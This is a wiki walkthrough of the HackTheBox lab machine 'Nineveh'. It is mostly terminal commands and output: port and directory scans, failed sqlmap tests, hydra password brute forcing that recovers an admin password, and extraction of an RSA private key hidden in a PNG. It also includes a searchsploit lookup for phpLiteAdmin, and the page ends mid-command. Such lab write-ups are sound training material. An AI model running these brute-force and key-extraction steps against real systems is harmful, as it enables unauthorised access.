Nineveh

From Luniwiki
Jump to: navigation, search

Back

Nineveh01.png

Ports scan

u505@kali:~/HTB/Machines/Nineveh$ sudo masscan -e tun0 -p1-65535,U:1-65535 --rate 1000 10.10.10.43
[sudo] password for u505:

Starting masscan 1.0.5 at 2020-05-10 18:48:08 GMT -- forced options: -sS -Pn -n --randomize-hosts -v --send-eth Initiating SYN Stealth Scan Scanning 1 hosts [131070 ports/host] Discovered open port 443/tcp on 10.10.10.43 Discovered open port 80/tcp on 10.10.10.43
u505@kali:~/HTB/Machines/Nineveh$ nmap -sC -sV 10.10.10.43
Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-07 21:05 EDT
Nmap scan report for 10.10.10.43
Host is up (0.054s latency).
Not shown: 998 filtered ports
PORT    STATE SERVICE  VERSION
80/tcp  open  http     Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
443/tcp open  ssl/http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
| ssl-cert: Subject: commonName=nineveh.htb/organizationName=HackTheBox Ltd/stateOrProvinceName=Athens/countryName=GR
| Not valid before: 2017-07-01T15:03:30
|_Not valid after:  2018-07-01T15:03:30
|_ssl-date: TLS randomness does not represent time
| tls-alpn:
|_  http/1.1

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 22.26 seconds
u505@kali:~/HTB/Machines/Nineveh$ sslscan --show-certificate https://nineveh.htb
Version: 2.0.0-static
OpenSSL 1.1.1f-dev  xx XXX xxxx

Connected to 10.10.10.43
Testing SSL server nineveh.htb on port 443 using SNI name nineveh.htb
SSL/TLS Protocols: SSLv2 disabled SSLv3 disabled TLSv1.0 enabled TLSv1.1 enabled TLSv1.2 enabled TLSv1.3 disabled
TLS Fallback SCSV: Server supports TLS Fallback SCSV
TLS renegotiation: Secure session renegotiation supported
TLS Compression: Compression disabled
Heartbleed: TLSv1.2 not vulnerable to heartbleed TLSv1.1 not vulnerable to heartbleed TLSv1.0 not vulnerable to heartbleed
Supported Server Cipher(s): Preferred TLSv1.2 256 bits ECDHE-RSA-AES256-GCM-SHA384 Curve P-256 DHE 256 Accepted TLSv1.2 256 bits DHE-RSA-AES256-GCM-SHA384 DHE 2048 bits Accepted TLSv1.2 128 bits ECDHE-RSA-AES128-GCM-SHA256 Curve P-256 DHE 256 Accepted TLSv1.2 128 bits DHE-RSA-AES128-GCM-SHA256 DHE 2048 bits Accepted TLSv1.2 256 bits ECDHE-RSA-AES256-SHA384 Curve P-256 DHE 256 Accepted TLSv1.2 256 bits DHE-RSA-AES256-SHA256 DHE 2048 bits Accepted TLSv1.2 128 bits ECDHE-RSA-AES128-SHA256 Curve P-256 DHE 256 Accepted TLSv1.2 128 bits DHE-RSA-AES128-SHA256 DHE 2048 bits Accepted TLSv1.2 256 bits ECDHE-RSA-AES256-SHA Curve P-256 DHE 256 Accepted TLSv1.2 256 bits DHE-RSA-AES256-SHA DHE 2048 bits Accepted TLSv1.2 256 bits DHE-RSA-CAMELLIA256-SHA DHE 2048 bits Accepted TLSv1.2 128 bits ECDHE-RSA-AES128-SHA Curve P-256 DHE 256 Accepted TLSv1.2 128 bits DHE-RSA-AES128-SHA DHE 2048 bits Accepted TLSv1.2 128 bits DHE-RSA-CAMELLIA128-SHA DHE 2048 bits Accepted TLSv1.2 256 bits AES256-GCM-SHA384 Accepted TLSv1.2 128 bits AES128-GCM-SHA256 Accepted TLSv1.2 256 bits AES256-SHA256 Accepted TLSv1.2 128 bits AES128-SHA256 Accepted TLSv1.2 256 bits AES256-SHA Accepted TLSv1.2 256 bits CAMELLIA256-SHA Accepted TLSv1.2 128 bits AES128-SHA Accepted TLSv1.2 128 bits CAMELLIA128-SHA Preferred TLSv1.1 256 bits ECDHE-RSA-AES256-SHA Curve P-256 DHE 256 Accepted TLSv1.1 256 bits DHE-RSA-AES256-SHA DHE 2048 bits Accepted TLSv1.1 256 bits DHE-RSA-CAMELLIA256-SHA DHE 2048 bits Accepted TLSv1.1 128 bits ECDHE-RSA-AES128-SHA Curve P-256 DHE 256 Accepted TLSv1.1 128 bits DHE-RSA-AES128-SHA DHE 2048 bits Accepted TLSv1.1 128 bits DHE-RSA-CAMELLIA128-SHA DHE 2048 bits Accepted TLSv1.1 256 bits AES256-SHA Accepted TLSv1.1 256 bits CAMELLIA256-SHA Accepted TLSv1.1 128 bits AES128-SHA Accepted TLSv1.1 128 bits CAMELLIA128-SHA Preferred TLSv1.0 256 bits ECDHE-RSA-AES256-SHA Curve P-256 DHE 256 Accepted TLSv1.0 256 bits DHE-RSA-AES256-SHA DHE 2048 bits Accepted TLSv1.0 256 bits DHE-RSA-CAMELLIA256-SHA DHE 2048 bits Accepted TLSv1.0 128 bits ECDHE-RSA-AES128-SHA Curve P-256 DHE 256 Accepted TLSv1.0 128 bits DHE-RSA-AES128-SHA DHE 2048 bits Accepted TLSv1.0 128 bits DHE-RSA-CAMELLIA128-SHA DHE 2048 bits Accepted TLSv1.0 256 bits AES256-SHA Accepted TLSv1.0 256 bits CAMELLIA256-SHA Accepted TLSv1.0 128 bits AES128-SHA Accepted TLSv1.0 128 bits CAMELLIA128-SHA
Server Key Exchange Group(s): TLSv1.2 141 bits sect283k1 TLSv1.2 141 bits sect283r1 TLSv1.2 204 bits sect409k1 TLSv1.2 204 bits sect409r1 TLSv1.2 285 bits sect571k1 TLSv1.2 285 bits sect571r1 TLSv1.2 128 bits secp256k1 TLSv1.2 128 bits secp256r1 (NIST P-256) TLSv1.2 192 bits secp384r1 (NIST P-384) TLSv1.2 260 bits secp521r1 (NIST P-521) TLSv1.2 128 bits brainpoolP256r1 TLSv1.2 192 bits brainpoolP384r1 TLSv1.2 256 bits brainpoolP512r1
Server Signature Algorithm(s): TLSv1.2 rsa_pkcs1_sha1 TLSv1.2 dsa_sha1 TLSv1.2 ecdsa_sha1 TLSv1.2 rsa_pkcs1_sha224 TLSv1.2 dsa_sha224 TLSv1.2 ecdsa_sha224 TLSv1.2 rsa_pkcs1_sha256 TLSv1.2 dsa_sha256 TLSv1.2 ecdsa_secp256r1_sha256 TLSv1.2 rsa_pkcs1_sha384 TLSv1.2 dsa_sha384 TLSv1.2 ecdsa_secp384r1_sha384 TLSv1.2 rsa_pkcs1_sha512 TLSv1.2 dsa_sha512 TLSv1.2 ecdsa_secp521r1_sha512
SSL Certificate: Certificate blob: -----BEGIN CERTIFICATE----- MIID+TCCAuGgAwIBAgIJANwojrkai1UOMA0GCSqGSIb3DQEBCwUAMIGSMQswCQYD VQQGEwJHUjEPMA0GA1UECAwGQXRoZW5zMQ8wDQYDVQQHDAZBdGhlbnMxFzAVBgNV BAoMDkhhY2tUaGVCb3ggTHRkMRAwDgYDVQQLDAdTdXBwb3J0MRQwEgYDVQQDDAtu aW5ldmVoLmh0YjEgMB4GCSqGSIb3DQEJARYRYWRtaW5AbmluZXZlaC5odGIwHhcN MTcwNzAxMTUwMzMwWhcNMTgwNzAxMTUwMzMwWjCBkjELMAkGA1UEBhMCR1IxDzAN BgNVBAgMBkF0aGVuczEPMA0GA1UEBwwGQXRoZW5zMRcwFQYDVQQKDA5IYWNrVGhl Qm94IEx0ZDEQMA4GA1UECwwHU3VwcG9ydDEUMBIGA1UEAwwLbmluZXZlaC5odGIx IDAeBgkqhkiG9w0BCQEWEWFkbWluQG5pbmV2ZWguaHRiMIIBIjANBgkqhkiG9w0B AQEFAAOCAQ8AMIIBCgKCAQEA+HUDrGgG769A68bslDXjV/uBaw18SaF52iEz/ui2 WwXguHnY8BS7ZetS4jAso6BOrGUZpN3+278mROPa4khQlmZ09cj8kQ4k7lOIxSlp eZxvt+R8fkJvtA7e47nvwP4H2O6SI0nD/pGDZc05i842kOc/8Kw+gKkglotGi8ZO GiuRgzyfdaNSWC7Lj3gTjVMCllhc6PgcQf9r7vK1KPkyFleYDUwB0dwf3taN0J2C U2EHz/4U1l40HoIngkwfhFI+2z2J/xx2JP+iFUcsV7LQRw0x4g6Z5WFWETluWUHi AWUZHrjMpMaXs3TZNNW81tWUP2jBulX5kv6H5CTocsXgyQIDAQABo1AwTjAdBgNV HQ4EFgQUh0YSfVOI05WyOFntGykwc3/OzrMwHwYDVR0jBBgwFoAUh0YSfVOI05Wy OFntGykwc3/OzrMwDAYDVR0TBAUwAwEB/zANBgkqhkiG9w0BAQsFAAOCAQEAehma AJKuLeAHqHAIcLopQg9mE28lYDGxf+3eIEuUAHmUKs0qGLs3ZTY8J77XTxmjvH1U qYVXfZSub1IG7LgUFybLFKNl6gioKEPXXA9ofKdoJX6Bar/0G/15YRSEZGc9WXh4 Xh1Qr3rkYYZj/rJa4H5uiWoRFofSTNGMfbY8iF8X2+P2LwyEOqThypdMBKMiIt6d 7sSuqsrnQRa73OdqdoCpHxEG6antne6Vvz3ALxv4cI7SqzKiQvH1zdJ/jOhZK1g1 CxLUGYbNsjIJWSdOoSlIgRswnu+A+O612+iosxYaYdCUZ8BElgjUAXLEHzuUFtRb KrYQgX28Ulf8OSGJuA== -----END CERTIFICATE----- Version: 2 Serial Number: dc:28:8e:b9:1a:8b:55:0e Signature Algorithm: sha256WithRSAEncryption Issuer: /C=GR/ST=Athens/L=Athens/O=HackTheBox Ltd/OU=Support/CN=nineveh.htb/emailAddress=admin@nineveh.htb Not valid before: Jul 1 15:03:30 2017 GMT Not valid after: Jul 1 15:03:30 2018 GMT Subject: /C=GR/ST=Athens/L=Athens/O=HackTheBox Ltd/OU=Support/CN=nineveh.htb/emailAddress=admin@nineveh.htb Public Key Algorithm: NULL RSA Public Key: (2048 bit) RSA Public-Key: (2048 bit) Modulus: 00:f8:75:03:ac:68:06:ef:af:40:eb:c6:ec:94:35: e3:57:fb:81:6b:0d:7c:49:a1:79:da:21:33:fe:e8: b6:5b:05:e0:b8:79:d8:f0:14:bb:65:eb:52:e2:30: 2c:a3:a0:4e:ac:65:19:a4:dd:fe:db:bf:26:44:e3: da:e2:48:50:96:66:74:f5:c8:fc:91:0e:24:ee:53: 88:c5:29:69:79:9c:6f:b7:e4:7c:7e:42:6f:b4:0e: de:e3:b9:ef:c0:fe:07:d8:ee:92:23:49:c3:fe:91: 83:65:cd:39:8b:ce:36:90:e7:3f:f0:ac:3e:80:a9: 20:96:8b:46:8b:c6:4e:1a:2b:91:83:3c:9f:75:a3: 52:58:2e:cb:8f:78:13:8d:53:02:96:58:5c:e8:f8: 1c:41:ff:6b:ee:f2:b5:28:f9:32:16:57:98:0d:4c: 01:d1:dc:1f:de:d6:8d:d0:9d:82:53:61:07:cf:fe: 14:d6:5e:34:1e:82:27:82:4c:1f:84:52:3e:db:3d: 89:ff:1c:76:24:ff:a2:15:47:2c:57:b2:d0:47:0d: 31:e2:0e:99:e5:61:56:11:39:6e:59:41:e2:01:65: 19:1e:b8:cc:a4:c6:97:b3:74:d9:34:d5:bc:d6:d5: 94:3f:68:c1:ba:55:f9:92:fe:87:e4:24:e8:72:c5: e0:c9 Exponent: 65537 (0x10001) X509v3 Extensions: X509v3 Subject Key Identifier: 87:46:12:7D:53:88:D3:95:B2:38:59:ED:1B:29:30:73:7F:CE:CE:B3 X509v3 Authority Key Identifier: keyid:87:46:12:7D:53:88:D3:95:B2:38:59:ED:1B:29:30:73:7F:CE:CE:B3
X509v3 Basic Constraints: CA:TRUE Verify Certificate: self signed certificate
SSL Certificate: Signature Algorithm: sha256WithRSAEncryption RSA Key Strength: 2048
Subject: nineveh.htb Issuer: nineveh.htb
Not valid before: Jul 1 15:03:30 2017 GMT Not valid after: Jul 1 15:03:30 2018 GMT

Web server port 80

Nineveh02.png

u505@kali:~/HTB/Machines/Nineveh$ curl http://nineveh.htb
<html><body><h1>It works!</h1>
 <p>This is the default web page for this server.</p>
 <p>The web server software is running but no content has been added, yet.</p>
 </body></html>

dirsearch

u505@kali:~/HTB/Machines/Nineveh$ python3 /opt/utils/dirsearch/dirsearch.py -w /usr/share/wordlists/dirb/common2.txt -e "js,html,txt,php" -f -t 50 -u http://nineveh.htb/

_|. _ _ _ _ _ _|_ v0.3.9 (_||| _) (/_(_|| (_| )
Extensions: js, html, txt, php | HTTP method: get | Threads: 50 | Wordlist size: 22974
Error Log: /opt/utils/dirsearch/logs/errors-20-05-07_21-22-22.log
Target: http://nineveh.htb/
[21:22:22] Starting: [21:22:23] 403 - 291B - /.html [21:22:25] 403 - 290B - /.php [21:22:49] 403 - 292B - /icons/ [21:22:49] 200 - 178B - /index.html [21:22:50] 200 - 83KB - /info.php/ [21:22:50] 200 - 83KB - /info.php [21:23:09] 403 - 300B - /server-status/
Task Completed

The first search doesn't provide much information execpt the info.php page. The second dirsearch with extended dictionnary and extensions txt and php give us more information.

Nineveh05.png

u505@kali:~/HTB/Machines/Nineveh$ python3 /opt/utils/dirsearch/dirsearch.py -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -e "txt,php" -f -t 50 -u http://nineveh.htb/

_|. _ _ _ _ _ _|_ v0.3.9 (_||| _) (/_(_|| (_| )
Extensions: txt, php | HTTP method: get | Threads: 50 | Wordlist size: 661562
Error Log: /opt/utils/dirsearch/logs/errors-20-05-07_21-35-35.log
Target: http://nineveh.htb/
[21:35:35] Starting: [21:35:35] 403 - 290B - /.php [21:35:36] 403 - 292B - /icons/ [21:35:37] 200 - 83KB - /info.php [21:35:54] 200 - 68B - /department/ [21:43:45] 403 - 300B - /server-status/
Task Completed

Nineveh06.png

Sqlmap

At first, We try to find if the page is vulnerable to SQL injection.

Nineveh07.png Nineveh08.png

u505@kali:~/HTB/Machines/Nineveh$ cat login.req
POST /department/login.php HTTP/1.1
Host: nineveh.htb
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://nineveh.htb/department/login.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 29
Connection: close
Cookie: PHPSESSID=f3u4488a8dav1cajju1jcreis3
Upgrade-Insecure-Requests: 1

username=admin&password=admin
u505@kali:~/HTB/Machines/Nineveh$ sqlmap -r login.req
        ___
       __H__
 ___ ___[.]_____ ___ ___  {1.4.4#stable}
|_ -| . [)]     | .'| . |
|___|_  ["]_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 21:37:44 /2020-05-07/
[21:37:44] [INFO] parsing HTTP request from 'login.req' [21:37:44] [INFO] testing connection to the target URL [21:37:44] [INFO] checking if the target is protected by some kind of WAF/IPS [21:37:45] [INFO] testing if the target URL content is stable [21:37:45] [INFO] target URL content is stable [21:37:45] [INFO] testing if POST parameter 'username' is dynamic [21:37:45] [WARNING] POST parameter 'username' does not appear to be dynamic [21:37:45] [WARNING] heuristic (basic) test shows that POST parameter 'username' might not be injectable [21:37:45] [INFO] testing for SQL injection on POST parameter 'username' [21:37:45] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' [21:37:46] [INFO] testing 'Boolean-based blind - Parameter replace (original value)' [21:37:46] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)' [21:37:47] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause' [21:37:47] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)' [21:37:48] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)' [21:37:48] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace (FLOOR)' [21:37:48] [INFO] testing 'Generic inline queries' [21:37:48] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)' [21:37:49] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)' [21:37:49] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)' [21:37:49] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' [21:37:50] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind' [21:37:50] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind (IF)' [21:37:50] [INFO] testing 'Oracle AND time-based blind' it is recommended to perform only basic UNION tests if there is not at least one other (potential) technique found. Do you want to reduce the number of requests? [Y/n] [21:37:55] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' [21:37:55] [WARNING] POST parameter 'username' does not seem to be injectable [21:37:55] [INFO] testing if POST parameter 'password' is dynamic [21:37:56] [WARNING] POST parameter 'password' does not appear to be dynamic [21:37:56] [WARNING] heuristic (basic) test shows that POST parameter 'password' might not be injectable [21:37:56] [INFO] testing for SQL injection on POST parameter 'password' [21:37:56] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' [21:37:56] [INFO] testing 'Boolean-based blind - Parameter replace (original value)' [21:37:56] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)' [21:37:57] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause' [21:37:57] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)' [21:37:58] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)' [21:37:58] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace (FLOOR)' [21:37:58] [INFO] testing 'Generic inline queries' [21:37:58] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)' [21:37:58] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)' [21:37:59] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)' [21:37:59] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' [21:38:00] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind' [21:38:00] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind (IF)' [21:38:01] [INFO] testing 'Oracle AND time-based blind' [21:38:01] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' [21:38:02] [WARNING] POST parameter 'password' does not seem to be injectable [21:38:02] [CRITICAL] all tested parameters do not appear to be injectable. Try to increase values for '--level'/'--risk' options if you wish to perform more tests. If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could try to use option '--tamper' (e.g. '--tamper=space2comment') and/or switch '--random-agent'
[*] ending @ 21:38:02 /2020-05-07/

We try with higher level and risk (and longer).

u505@kali:~/HTB/Machines/Nineveh$ sqlmap -r login.req --level 4 --risk 3
...
[21:55:40] [CRITICAL] all tested parameters do not appear to be injectable. Try to increase values for '--level'/'--risk' options if you wish to perform more tests. If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could try to use option '--tamper' (e.g. '--tamper=space2comment') and/or switch '--random-agent'

[*] ending @ 21:55:40 /2020-05-07/

But results were similar, so the application doesn't seem to be vulnerable at SQL injection.

Network brute force

Nineveh09.png Nineveh10.png

If we try to login with user admin, the system returns Invalid password, but if we try with user u505, the system returns Invalid username. We can deduct that the user admin exists

Nineveh11.png Nineveh12.png

We try to brute force the login page with user admin

u505@kali:~/HTB/Machines/Nineveh$ hydra -l admin -P /usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt "http-post-form://nineveh.htb/department/login.php:username=admin&password=^PASS^:Invalid Password"
Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-05-07 22:31:02 [DATA] max 16 tasks per 1 server, overall 16 tasks, 14344398 login tries (l:1/p:14344398), ~896525 tries per task [DATA] attacking http-post-form://nineveh.htb:80/department/login.php:username=admin&password=^PASS^:Invalid Password [STATUS] 1858.00 tries/min, 1858 tries in 00:01h, 14342540 to do in 128:40h, 16 active [80][http-post-form] host: nineveh.htb login: admin password: 1q2w3e4r5t 1 of 1 target successfully completed, 1 valid password found Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020-05-07 22:33:32

Web server port 443

Nineveh03.png

u505@kali:~/HTB/Machines/Nineveh$ curl -k https://nineveh.htb
<center><img src="ninevehForAll.png" /></center>
u505@kali:~/HTB/Machines/Nineveh$ wget  --no-check-certificate https://nineveh.htb/ninevehForAll.png
--2020-05-07 21:14:08--  https://nineveh.htb/ninevehForAll.png
Resolving nineveh.htb (nineveh.htb)... 10.10.10.43
Connecting to nineveh.htb (nineveh.htb)|10.10.10.43|:443... connected.
WARNING: The certificate of ‘nineveh.htb’ is not trusted.
WARNING: The certificate of ‘nineveh.htb’ doesn't have a known issuer.
WARNING: The certificate of ‘nineveh.htb’ has expired.
The certificate has expired
HTTP request sent, awaiting response... 200 OK
Length: 560852 (548K) [image/png]
Saving to: ‘ninevehForAll.png’

ninevehForAll.png 100%[======================================>] 547.71K 1.29MB/s in 0.4s
2020-05-07 21:14:09 (1.29 MB/s) - ‘ninevehForAll.png’ saved [560852/560852]

Dirsearch

u505@kali:~/HTB/Machines/Nineveh$ python3 /opt/utils/dirsearch/dirsearch.py -w /usr/share/wordlists/dirb/common2.txt -e "js,html,txt,php" -f -t 50 -u https://nineveh.htb

_|. _ _ _ _ _ _|_ v0.3.9 (_||| _) (/_(_|| (_| )
Extensions: js, html, txt, php | HTTP method: get | Threads: 50 | Wordlist size: 22974
Error Log: /opt/utils/dirsearch/logs/errors-20-05-07_21-12-45.log
Target: https://nineveh.htb
[21:12:45] Starting: [21:12:46] 403 - 291B - /.php [21:12:46] 403 - 292B - /.html [21:13:03] 200 - 11KB - /db/ [21:13:15] 403 - 293B - /icons/ [21:13:16] 200 - 49B - /index.html [21:13:39] 403 - 301B - /server-status/
Task Completed

An extended search, gives us more information.

u505@kali:~/HTB/Machines/Nineveh$ python3 /opt/utils/dirsearch/dirsearch.py -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -e "txt,php" -f -t 50 -u https://nineveh.htb/

_|. _ _ _ _ _ _|_ v0.3.9 (_||| _) (/_(_|| (_| )
Extensions: txt, php | HTTP method: get | Threads: 50 | Wordlist size: 661562
Error Log: /opt/utils/dirsearch/logs/errors-20-05-07_21-35-22.log
Target: https://nineveh.htb/
[21:35:23] Starting: [21:35:23] 403 - 291B - /.php [21:35:24] 403 - 293B - /icons/ [21:35:31] 200 - 11KB - /db/ [21:45:00] 403 - 301B - /server-status/ [21:45:01] 200 - 71B - /secure_notes/
Task Completed

Secure_notes

An image appears.

Europa25.png

The source code doesn't provide more informations.

u505@kali:~/HTB/Machines/Nineveh$ curl -k https://nineveh.htb/secure_notes/
<html>
 <body>
 <center><img src=nineveh.png /></center>
 </body>
 </html>

Download of the image.

u505@kali:~/HTB/Machines/Nineveh$ wget  --no-check-certificate https://nineveh.htb/secure_notes/nineveh.png
--2020-05-07 21:28:55--  https://nineveh.htb/secure_notes/nineveh.png
Resolving nineveh.htb (nineveh.htb)... 10.10.10.43
Connecting to nineveh.htb (nineveh.htb)|10.10.10.43|:443... connected.
WARNING: The certificate of ‘nineveh.htb’ is not trusted.
WARNING: The certificate of ‘nineveh.htb’ doesn't have a known issuer.
WARNING: The certificate of ‘nineveh.htb’ has expired.
The certificate has expired
HTTP request sent, awaiting response... 200 OK
Length: 2891984 (2.8M) [image/png]
Saving to: ‘nineveh.png’

nineveh.png 100%[======================================>] 2.76M 645KB/s in 4.4s
2020-05-07 21:28:59 (639 KB/s) - ‘nineveh.png’ saved [2891984/2891984]

Some information has been appended at the end of the image, in tar format.

u505@kali:~/HTB/Machines/Nineveh$ strings nineveh.png | tail -n 60
r)'es
IEND
secret/
0000755
0000041
0000041
00000000000
13126060277
012377
ustar
www-data
www-data
secret/nineveh.priv
0000600
0000041
0000041
00000003213
13126045656
014730
ustar
www-data
www-data
-----BEGIN RSA PRIVATE KEY-----
MIIEowIBAAKCAQEAri9EUD7bwqbmEsEpIeTr2KGP/wk8YAR0Z4mmvHNJ3UfsAhpI
H9/Bz1abFbrt16vH6/jd8m0urg/Em7d/FJncpPiIH81JbJ0pyTBvIAGNK7PhaQXU
PdT9y0xEEH0apbJkuknP4FH5Zrq0nhoDTa2WxXDcSS1ndt/M8r+eTHx1bVznlBG5
FQq1/wmB65c8bds5tETlacr/15Ofv1A2j+vIdggxNgm8A34xZiP/WV7+7mhgvcnI
3oqwvxCI+VGhQZhoV9Pdj4+D4l023Ub9KyGm40tinCXePsMdY4KOLTR/z+oj4sQT
X+/1/xcl61LADcYk0Sw42bOb+yBEyc1TTq1NEQIDAQABAoIBAFvDbvvPgbr0bjTn
KiI/FbjUtKWpWfNDpYd+TybsnbdD0qPw8JpKKTJv79fs2KxMRVCdlV/IAVWV3QAk
FYDm5gTLIfuPDOV5jq/9Ii38Y0DozRGlDoFcmi/mB92f6s/sQYCarjcBOKDUL58z
GRZtIwb1RDgRAXbwxGoGZQDqeHqaHciGFOugKQJmupo5hXOkfMg/G+Ic0Ij45uoR
JZecF3lx0kx0Ay85DcBkoYRiyn+nNgr/APJBXe9Ibkq4j0lj29V5dT/HSoF17VWo
9odiTBWwwzPVv0i/JEGc6sXUD0mXevoQIA9SkZ2OJXO8JoaQcRz628dOdukG6Utu
Bato3bkCgYEA5w2Hfp2Ayol24bDejSDj1Rjk6REn5D8TuELQ0cffPujZ4szXW5Kb
ujOUscFgZf2P+70UnaceCCAPNYmsaSVSCM0KCJQt5klY2DLWNUaCU3OEpREIWkyl
1tXMOZ/T5fV8RQAZrj1BMxl+/UiV0IIbgF07sPqSA/uNXwx2cLCkhucCgYEAwP3b
vCMuW7qAc9K1Amz3+6dfa9bngtMjpr+wb+IP5UKMuh1mwcHWKjFIF8zI8CY0Iakx
DdhOa4x+0MQEtKXtgaADuHh+NGCltTLLckfEAMNGQHfBgWgBRS8EjXJ4e55hFV89
P+6+1FXXA1r/Dt/zIYN3Vtgo28mNNyK7rCr/pUcCgYEAgHMDCp7hRLfbQWkksGzC
fGuUhwWkmb1/ZwauNJHbSIwG5ZFfgGcm8ANQ/Ok2gDzQ2PCrD2Iizf2UtvzMvr+i
tYXXuCE4yzenjrnkYEXMmjw0V9f6PskxwRemq7pxAPzSk0GVBUrEfnYEJSc/MmXC
iEBMuPz0RAaK93ZkOg3Zya0CgYBYbPhdP5FiHhX0+7pMHjmRaKLj+lehLbTMFlB1
MxMtbEymigonBPVn56Ssovv+bMK+GZOMUGu+A2WnqeiuDMjB99s8jpjkztOeLmPh
PNilsNNjfnt/G3RZiq1/Uc+6dFrvO/AIdw+goqQduXfcDOiNlnr7o5c0/Shi9tse
i6UOyQKBgCgvck5Z1iLrY1qO5iZ3uVr4pqXHyG8ThrsTffkSVrBKHTmsXgtRhHoc
il6RYzQV/2ULgUBfAwdZDNtGxbu5oIUB938TCaLsHFDK6mSTbvB/DywYYScAWwF7
fw4LVXdQMjNJC3sn3JaqY1zJkE4jXlZeNQvCx4ZadtdJD9iO+EUG
-----END RSA PRIVATE KEY-----
secret/nineveh.pub
0000644
0000041
0000041
00000000620
13126060277
014541
ustar
www-data
www-data
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCuL0RQPtvCpuYSwSkh5OvYoY//CTxgBHRniaa8c0ndR+wCGkgf38HPVpsVuu3Xq8fr+N3ybS6uD8Sbt38Umdyk+IgfzUlsnSnJMG8gAY0rs+FpBdQ91P3LTEQQfRqlsmS6Sc/gUflmurSeGgNNrZbFcNxJLWd238zyv55MfHVtXOeUEbkVCrX/CYHrlzxt2zm0ROVpyv/Xk5+/UDaP68h2CDE2CbwDfjFmI/9ZXv7uaGC9ycjeirC/EIj5UaFBmGhX092Pj4PiXTbdRv0rIabjS2KcJd4+wx1jgo4tNH/P6iPixBNf7/X/FyXrUsANxiTRLDjZs5v7IETJzVNOrU0R amrois@nineveh.htb

We save Amrois' private key, although ssh port is not available externally.

Db folder

Nineveh04.png

u505@kali:~/HTB/Machines/Nineveh$ searchsploit phpliteadmin
----------------------------------------------------------------- ----------------------------------------
 Exploit Title                                                   |  Path
                                                                 | (/usr/share/exploitdb/)
----------------------------------------------------------------- ----------------------------------------
PHPLiteAdmin 1.9.3 - Remote PHP Code Injection                   | exploits/php/webapps/24044.txt
phpLiteAdmin - 'table' SQL Injection                             | exploits/php/webapps/38228.txt
phpLiteAdmin 1.1 - Multiple Vulnerabilities                      | exploits/php/webapps/37515.txt
phpLiteAdmin 1.9.6 - Multiple Vulnerabilities                    | exploits/php/webapps/39714.txt
----------------------------------------------------------------- ----------------------------------------
Shellcodes: No Result
Papers: No Result
u505@kali:~/HTB/Machines/Nineveh$ searchsploit -m 24044
  Exploit: PHPLiteAdmin 1.9.3 - Remote PHP Code Injection
      URL: https://www.exploit-db.com/exploits/24044
     Path: /usr/share/exploitdb/exploits/php/webapps/24044.txt
File Type: ASCII text, with CRLF line terminators

Copied to: /home/u505/HTB/Machines/Nineveh/24044.txt

The exploit 24044 is very promising, it allows to embed php code in SQLite databases, but we need to log into the application.

u505@kali:~/HTB/Machines/Nineveh$ hydra -l admin -P /usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt "https-post-form://nineveh.htb/db/:password=^PASS^&remember=yes&login=Log+In&proc_login=true:Incorrect password"
Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

